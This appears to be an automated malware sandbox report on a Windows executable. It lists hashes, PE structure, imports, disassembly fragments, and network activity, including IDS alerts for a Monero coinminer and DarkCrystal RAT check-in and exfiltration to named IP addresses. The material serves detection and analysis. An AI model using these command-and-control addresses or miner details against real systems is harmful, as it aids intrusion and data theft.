SHA-256:	093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
SHA-512:	1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
Malicious:	false
Preview:	.... ...........................\|...<...............0...........\|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi

C:\Windows\System32\SecurityHealthSystray.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4608
Entropy (8bit):	3.9234125583554786
Encrypted:	false
SSDEEP:	48:60pLPt2M7Jt8Bs3FJsdcV4MKe27vvqBHuOulajfqXSfbNtm:7PVPc+Vx9MvvkIcjRzNt
MD5:	7BB479BD5A9F1E01606AD74569B9E52F
SHA1:	C0FAA32D2EBE2FAFB8A07CAB732E36C6BE6E8F66
SHA-256:	A948CA338AC996677D681741C15888ECF0FABCD1C5B66DC5848C94C09DA6BF53
SHA-512:	B7D427B68F9E442AB6D8FF401455277C7870CE64A472BF9CCF5E4FD3E82C9CFFE5485DF0B8502CCACEE43F62C22DE5F944EFD6335DFBE529884FCB5E0596B76D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f............................~'... ...@....@.. ....................................@.................................,'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................`'......H.......(!................................................................(.....0..!.......r...pre..p.{....(....(....&..&......................0..........ri..p(....&..&......................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(......(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID....... ...#Blob...........WU........%3................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.99838673729773
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	8Ck8T5qRcC.exe
File size:	17'830'453 bytes
MD5:	4fec8faf6590f62034ad44a54175b9e9
SHA1:	d7f0d639d943aeee3f98442eec744ca0e78a07d1
SHA256:	68231c9b195a3987bc26bb9af2543f49a04c1343bbb17982bc6302a21138e33a
SHA512:	a6307fb6ced7699c4743235cbe31a8b3673f3d9fc2421ac455ece7c3c0990a15aefb20a78120d0ff62752b7e3d922056ee0212a13b85144c73b24507f9678b19
SSDEEP:	393216:ToNLbkNj0zztkKxXziCnbvCyHPSh5NzQSRAgS+aCBtd:TohLzht3nZHY59RRAP0d
TLSH:	A2073323B7E6E473E4376C315D694F4AF0A838311B584ADB03B6ADFDAED05F24295281
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........W...6...6...6....V..6....T.'6....U..6..)MZ..6..)M...6..)M...6..)M...6...N$..6...N4..6...6...7..'M...6..'M...6..'MX..6..'M...6.

File Icon


Icon Hash:	1515d4d4442f2d2d

Static PE Info

General

Entrypoint:	0x421d50
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x651BC7F7 [Tue Oct 3 07:51:19 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	75e9596d74d063246ba6f3ac7c5369a0

Entrypoint Preview

Instruction
call 00007F2D38C83BABh
jmp 00007F2D38C8355Dh
int3
int3
int3
int3
int3
int3
push 00424F20h
push dword ptr fs:[00000000h]
mov eax, dword ptr [esp+10h]
mov dword ptr [esp+10h], ebp
lea ebp, dword ptr [esp+10h]
sub esp, eax
push ebx
push esi
push edi
mov eax, dword ptr [0044277Ch]
xor dword ptr [ebp-04h], eax
xor eax, ebp
push eax
mov dword ptr [ebp-18h], esp
push dword ptr [ebp-08h]
mov eax, dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFEh
mov dword ptr [ebp-08h], eax
lea eax, dword ptr [ebp-10h]
mov dword ptr fs:[00000000h], eax
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov ecx, dword ptr [ebp-10h]
mov dword ptr fs:[00000000h], ecx
pop ecx
pop edi
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
push ecx
ret
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007F2D38C75C81h
push 0043F388h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007F2D38C860D5h
int3
jmp 00007F2D38C87FA8h
push ebp
mov ebp, esp
and dword ptr [00466078h], 00000000h
sub esp, 24h
or dword ptr [004427B0h], 01h
push 0000000Ah
call dword ptr [004361D0h]
test eax, eax
je 00007F2D38C83892h
and dword ptr [ebp-10h], 00000000h
xor eax, eax
push ebx
push esi
push edi
xor ecx, ecx
lea edi, dword ptr [ebp-24h]

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x405c0	0x34	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x405f4	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x68000	0xe044	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x77000	0x255c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3e3b0	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x388b0	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x36000	0x278	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x3fa9c	0x120	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x345cc	0x34600	b7a8b04ab2248443b05e8133fb3a9064	False	0.5887343377088305	data	6.708390817791953	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x36000	0xb410	0xb600	a418919d63b67e937555eec95d3b6bcb	False	0.45409083104395603	Applesoft BASIC program data, first line number 4	5.215945456388312	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x42000	0x24758	0x1200	d8d5c95192b51ddad1857caa38e7daa9	False	0.4049479166666667	data	4.078919796039023	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat	0x67000	0x1a4	0x200	ee74a17c4eeb586c9811481b77498b43	False	0.4609375	data	3.5194570553957747	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x68000	0xe044	0xe200	e1d0c28d23b6b5c7cae80fcd7a967218	False	0.6343853705752213	data	6.80236513212897	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x77000	0x255c	0x2600	699c6b2b1b2acad2d0f219d9328713af	False	0.783203125	data	6.6660836278877325	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
PNG	0x68644	0xb45	PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced	1.0027729636048528
PNG	0x6918c	0x15a9	PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced	0.9363390441839495
RT_ICON	0x6a738	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors	0.47832369942196534
RT_ICON	0x6aca0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors	0.5410649819494585
RT_ICON	0x6b548	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors	0.4933368869936034
RT_ICON	0x6c3f0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m	0.5390070921985816
RT_ICON	0x6c858	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m	0.41393058161350843
RT_ICON	0x6d900	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m	0.3479253112033195
RT_ICON	0x6fea8	0x3d71	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9809269502193401
RT_DIALOG	0x73c1c	0x2ba	data	0.5286532951289399
RT_DIALOG	0x73ed8	0x13a	data	0.6560509554140127
RT_DIALOG	0x74014	0xf2	data	0.71900826446281
RT_DIALOG	0x74108	0x14a	data	0.6
RT_DIALOG	0x74254	0x314	data	0.47588832487309646
RT_DIALOG	0x74568	0x24a	data	0.6279863481228669
RT_STRING	0x747b4	0x1fc	data	0.421259842519685
RT_STRING	0x749b0	0x246	data	0.41924398625429554
RT_STRING	0x74bf8	0x1a6	data	0.514218009478673
RT_STRING	0x74da0	0xdc	data	0.65
RT_STRING	0x74e7c	0x470	data	0.3873239436619718
RT_STRING	0x752ec	0x164	data	0.5056179775280899
RT_STRING	0x75450	0x110	data	0.5772058823529411
RT_STRING	0x75560	0x158	data	0.4563953488372093
RT_STRING	0x756b8	0xe8	data	0.5948275862068966
RT_STRING	0x757a0	0xe6	data	0.5695652173913044
RT_GROUP_ICON	0x75888	0x68	data	0.7019230769230769
RT_MANIFEST	0x758f0	0x753	XML 1.0 document, ASCII text, with CRLF line terminators	0.3957333333333333

Imports

DLL	Import
KERNEL32.dll	GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, GetCurrentProcessId, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetTimeFormatW, GetDateFormatW, LocalFree, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapReAlloc, HeapAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
OLEAUT32.dll	SysAllocString, SysFreeString, VariantClear
gdiplus.dll	GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-08-01T04:27:06.688070+0200	TCP	2826930	ETPRO COINMINER XMR CoinMiner Usage	49738	443	192.168.2.4	95.179.241.203
2024-08-01T04:27:45.505027+0200	TCP	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	49739	80	192.168.2.4	194.58.42.154
2024-08-01T04:28:25.451584+0200	TCP	2048130	ET MALWARE [ANY.RUN] DarkCrystal Rat Exfiltration (POST)	49753	80	192.168.2.4	194.58.42.154
2024-08-01T04:27:42.804877+0200	UDP	2036289	ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)	59750	53	192.168.2.4	1.1.1.1

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 1, 2024 04:27:43.541836023 CEST	49739	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:27:43.547291994 CEST	80	49739	194.58.42.154	192.168.2.4
Aug 1, 2024 04:27:43.547395945 CEST	49739	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:27:45.026078939 CEST	49739	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:27:45.031477928 CEST	80	49739	194.58.42.154	192.168.2.4
Aug 1, 2024 04:27:45.406383038 CEST	49739	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:27:45.473998070 CEST	80	49739	194.58.42.154	192.168.2.4
Aug 1, 2024 04:27:45.474910021 CEST	80	49739	194.58.42.154	192.168.2.4
Aug 1, 2024 04:27:45.504803896 CEST	80	49739	194.58.42.154	192.168.2.4
Aug 1, 2024 04:27:45.505027056 CEST	49739	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:27:46.032799959 CEST	80	49739	194.58.42.154	192.168.2.4
Aug 1, 2024 04:27:46.033272982 CEST	80	49739	194.58.42.154	192.168.2.4
Aug 1, 2024 04:27:46.033364058 CEST	49739	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:27:49.604711056 CEST	49739	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:27:49.657040119 CEST	80	49739	194.58.42.154	192.168.2.4
Aug 1, 2024 04:27:49.855612040 CEST	49740	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:27:49.861051083 CEST	80	49740	194.58.42.154	192.168.2.4
Aug 1, 2024 04:27:49.862083912 CEST	49740	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:27:49.867995977 CEST	49740	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:27:49.873214006 CEST	80	49740	194.58.42.154	192.168.2.4
Aug 1, 2024 04:27:49.874025106 CEST	80	49739	194.58.42.154	192.168.2.4
Aug 1, 2024 04:27:49.876854897 CEST	49739	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:27:49.882309914 CEST	80	49739	194.58.42.154	192.168.2.4
Aug 1, 2024 04:27:50.151701927 CEST	80	49739	194.58.42.154	192.168.2.4
Aug 1, 2024 04:27:50.315182924 CEST	49739	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:27:50.682379961 CEST	80	49740	194.58.42.154	192.168.2.4
Aug 1, 2024 04:27:50.756028891 CEST	49740	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:27:50.868844032 CEST	49740	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:27:50.874166965 CEST	80	49740	194.58.42.154	192.168.2.4
Aug 1, 2024 04:27:51.156352043 CEST	80	49740	194.58.42.154	192.168.2.4
Aug 1, 2024 04:27:51.252652884 CEST	49740	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:27:52.245501041 CEST	49739	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:27:52.251007080 CEST	80	49739	194.58.42.154	192.168.2.4
Aug 1, 2024 04:27:52.513803005 CEST	80	49739	194.58.42.154	192.168.2.4
Aug 1, 2024 04:27:52.514266968 CEST	49739	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:27:52.519144058 CEST	80	49739	194.58.42.154	192.168.2.4
Aug 1, 2024 04:27:52.519179106 CEST	80	49739	194.58.42.154	192.168.2.4
Aug 1, 2024 04:27:52.519191027 CEST	80	49739	194.58.42.154	192.168.2.4
Aug 1, 2024 04:27:52.798106909 CEST	80	49739	194.58.42.154	192.168.2.4
Aug 1, 2024 04:27:52.924472094 CEST	49739	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:27:53.034796000 CEST	49739	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:27:53.036413908 CEST	49741	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:27:53.041486979 CEST	80	49739	194.58.42.154	192.168.2.4
Aug 1, 2024 04:27:53.041543961 CEST	49739	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:27:53.042572975 CEST	80	49741	194.58.42.154	192.168.2.4
Aug 1, 2024 04:27:53.042653084 CEST	49741	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:27:53.042762995 CEST	49741	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:27:53.050988913 CEST	80	49741	194.58.42.154	192.168.2.4
Aug 1, 2024 04:27:53.393539906 CEST	49741	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:27:53.398727894 CEST	80	49741	194.58.42.154	192.168.2.4
Aug 1, 2024 04:27:53.398749113 CEST	80	49741	194.58.42.154	192.168.2.4
Aug 1, 2024 04:27:53.837814093 CEST	80	49741	194.58.42.154	192.168.2.4
Aug 1, 2024 04:27:53.924467087 CEST	49741	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:27:53.968586922 CEST	80	49741	194.58.42.154	192.168.2.4
Aug 1, 2024 04:27:54.127569914 CEST	49741	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:27:56.161437035 CEST	80	49740	194.58.42.154	192.168.2.4
Aug 1, 2024 04:27:56.164872885 CEST	49740	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:27:58.853513956 CEST	80	49741	194.58.42.154	192.168.2.4
Aug 1, 2024 04:27:58.853657007 CEST	49741	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:27:59.859435081 CEST	49743	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:27:59.868697882 CEST	80	49743	194.58.42.154	192.168.2.4
Aug 1, 2024 04:27:59.868884087 CEST	49743	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:27:59.877945900 CEST	49743	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:27:59.883210897 CEST	80	49743	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:00.247396946 CEST	49743	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:00.253099918 CEST	80	49743	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:00.253118038 CEST	80	49743	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:00.689836025 CEST	80	49743	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:00.752691984 CEST	49743	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:00.825644970 CEST	80	49743	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:00.955818892 CEST	49743	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:05.699045897 CEST	80	49743	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:05.699196100 CEST	49743	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:05.798696041 CEST	49744	80	192.168.2.4	208.95.112.1
Aug 1, 2024 04:28:05.803570986 CEST	80	49744	208.95.112.1	192.168.2.4
Aug 1, 2024 04:28:05.803668022 CEST	49744	80	192.168.2.4	208.95.112.1
Aug 1, 2024 04:28:05.803774118 CEST	49744	80	192.168.2.4	208.95.112.1
Aug 1, 2024 04:28:05.808605909 CEST	80	49744	208.95.112.1	192.168.2.4
Aug 1, 2024 04:28:05.919732094 CEST	49740	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:05.925266027 CEST	80	49740	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:05.943113089 CEST	49743	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:05.943424940 CEST	49745	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:05.948393106 CEST	80	49743	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:05.948549986 CEST	80	49745	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:05.948663950 CEST	49745	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:05.948719978 CEST	49745	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:05.954044104 CEST	80	49745	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:06.197225094 CEST	49746	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:06.202572107 CEST	80	49746	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:06.202661037 CEST	49746	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:06.202893019 CEST	49746	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:06.208067894 CEST	80	49746	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:06.314574003 CEST	49745	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:06.550543070 CEST	49746	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:06.627587080 CEST	49746	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:06.627830982 CEST	49745	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:07.127603054 CEST	49746	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:07.273669004 CEST	80	49744	208.95.112.1	192.168.2.4
Aug 1, 2024 04:28:07.274243116 CEST	80	49744	208.95.112.1	192.168.2.4
Aug 1, 2024 04:28:07.274374008 CEST	49744	80	192.168.2.4	208.95.112.1
Aug 1, 2024 04:28:07.274805069 CEST	80	49745	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:07.274915934 CEST	80	49744	208.95.112.1	192.168.2.4
Aug 1, 2024 04:28:07.275496006 CEST	80	49745	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:07.275549889 CEST	80	49746	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:07.275551081 CEST	49744	80	192.168.2.4	208.95.112.1
Aug 1, 2024 04:28:07.275592089 CEST	49745	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:07.275804996 CEST	80	49745	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:07.275856972 CEST	49745	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:07.275859118 CEST	80	49744	208.95.112.1	192.168.2.4
Aug 1, 2024 04:28:07.275887966 CEST	80	49746	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:07.275935888 CEST	49746	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:07.275938034 CEST	49744	80	192.168.2.4	208.95.112.1
Aug 1, 2024 04:28:07.278335094 CEST	80	49745	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:07.278793097 CEST	80	49745	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:07.278924942 CEST	49745	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:07.280627966 CEST	80	49745	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:07.280668020 CEST	80	49746	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:07.280695915 CEST	80	49746	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:07.280725956 CEST	80	49746	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:07.280752897 CEST	80	49745	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:07.280780077 CEST	80	49746	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:07.280807018 CEST	80	49745	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:07.280868053 CEST	80	49746	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:07.284101009 CEST	80	49745	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:07.440947056 CEST	80	49746	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:07.444894075 CEST	49746	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:07.549725056 CEST	80	49746	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:07.721338034 CEST	49746	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:07.730700970 CEST	80	49745	194.58.42.154	192.168.2.4
Aug 1, 2024 04:28:07.924505949 CEST	49745	80	192.168.2.4	194.58.42.154
Aug 1, 2024 04:28:08.368081093 CEST	49747	443	192.168.2.4	162.159.136.232
Aug 1, 2024 04:28:08.368164062 CEST	443	49747	162.159.136.232	192.168.2.4
Aug 1, 2024 04:28:08.368241072 CEST	49747	443	192.168.2.4	162.159.136.232
Aug 1, 2024 04:28:08.392283916 CEST	49747	443	192.168.2.4	162.159.136.232
Aug 1, 2024 04:28:08.392360926 CEST	443	49747	162.159.136.232	192.168.2.4
Aug 1, 2024 04:28:08.866635084 CEST	443	49747	162.159.136.232	192.168.2.4
Aug 1, 2024 04:28:08.867140055 CEST	49747	443	192.168.2.4	162.159.136.232
Aug 1, 2024 04:28:08.867202997 CEST	443	49747	162.159.136.232	192.168.2.4
Aug 1, 2024 04:28:08.868834972 CEST	443	49747	162.159.136.232	192.168.2.4
Aug 1, 2024 04:28:08.869060040 CEST	49747	443	192.168.2.4	162.159.136.232
Aug 1, 2024 04:28:08.869667053 CEST	49747	443	192.168.2.4	162.159.136.232
Aug 1, 2024 04:28:08.869798899 CEST	443	49747	162.159.136.232	192.168.2.4
Aug 1, 2024 04:28:08.869880915 CEST	49747	443	192.168.2.4	162.159.136.232
Aug 1, 2024 04:28:08.869929075 CEST	443	49747	162.159.136.232	192.168.2.4
Aug 1, 2024 04:28:08.870011091 CEST	49747	443	192.168.2.4	162.159.136.232
Aug 1, 2024 04:28:08.870069981 CEST	443	49747	162.159.136.232	192.168.2.4
Aug 1, 2024 04:28:08.870317936 CEST	49747	443	192.168.2.4	162.159.136.232
Aug 1, 2024 04:28:08.870418072 CEST	443	49747	162.159.136.232	192.168.2.4
Aug 1, 2024 04:28:08.870589018 CEST	49747	443	192.168.2.4	162.159.136.232
Aug 1, 2024 04:28:08.870666027 CEST	443	49747	162.159.136.232	192.168.2.4
Aug 1, 2024 04:28:08.870800972 CEST	49747	443	192.168.2.4	162.159.136.232
Aug 1, 2024 04:28:08.870878935 CEST	443	49747	162.159.136.232	192.168.2.4
Aug 1, 2024 04:28:08.870930910 CEST	49747	443	192.168.2.4	162.159.136.232
Aug 1, 2024 04:28:08.870953083 CEST	443	49747	162.159.136.232	192.168.2.4
Aug 1, 2024 04:28:08.871011019 CEST	49747	443	192.168.2.4	162.159.136.232
Aug 1, 2024 04:28:08.871035099 CEST	443	49747	162.159.136.232	192.168.2.4
Aug 1, 2024 04:28:08.871045113 CEST	49747	443	192.168.2.4	162.159.136.232
